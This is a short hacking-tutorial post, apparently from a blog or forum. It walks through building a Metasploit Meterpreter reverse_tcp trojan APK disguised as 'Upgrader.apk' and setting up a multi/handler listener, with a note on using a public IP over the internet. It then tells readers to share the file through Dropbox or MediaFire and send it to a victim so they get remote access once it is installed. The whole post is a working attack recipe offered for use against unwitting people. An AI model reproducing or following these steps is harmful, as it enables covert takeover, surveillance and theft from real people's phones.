How to Hack Android Smartphones Using KALI LINUX
Hello! guys,
I am now posting about how to hack Android smartphones using KALI LINUX .
So here we go:-
Hello! guys,
I am now posting about how to hack Android smartphones using KALI LINUX .
So here we go:-
1. Start Kali and make a Trojan.apk for doing this, type:--
msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.2 R > /root/Upgrader.apk (Spoof LHOST with ur own IP address)
(U can use any name for ur Trojan) like emoticon
Note:- " You can also hack android on WAN by replacing/spoofing LHOST with ur public/external ip.
2. Open another terminal and load metasploit console until the file is been produced. So type the following command for metasploit:-
msfconsole "And hit enter"
3. Set-up a listner by typing:-
use exploit/multi/handler
Now set-up a reverse payload by typing:-
set payload android/meterpreter/reverse_tcp
To set LHOST type:~ set LHOST 192.168.0.2 (even if u r hacking on WAN use ur private ip here)
4. Now type:- Exploit to start listner
Then copy the file u made upgrader.apk from the root folder of linux.
then upload to any of the file sharing sites dropbox, mediafire etc and send it to the victim.
When he/she install it and opens it you will be able to remotely access it on the metrepreter prompt kiki emoticon
So thats it.
Happy Hacking with emoticon

